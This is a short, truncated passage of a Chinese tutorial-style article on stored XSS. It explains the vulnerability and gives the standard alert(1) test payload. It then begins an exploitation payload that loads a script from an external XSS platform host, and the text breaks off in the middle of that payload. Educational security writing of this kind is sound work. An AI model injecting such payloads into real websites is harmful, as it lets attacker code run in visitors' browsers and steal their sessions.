一次存储型XSS的攻防实战
什么是存储型XSS它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,一般是注入一段javascript脚本。在测试过程中,我们一般是使用:1<script>alert(1)</script>通过这段js代码,弹个框来证明存在xss漏洞。那么,可能新手就会问了,弹个框有什么用呢?其实,弹框只是为了证明存在此漏洞。而此漏洞的利用方式由很多种。比如,你可以使用xss平台:写入一段平台生成的xss脚本:1<script src=//xsspt.com/ZsgUBf&g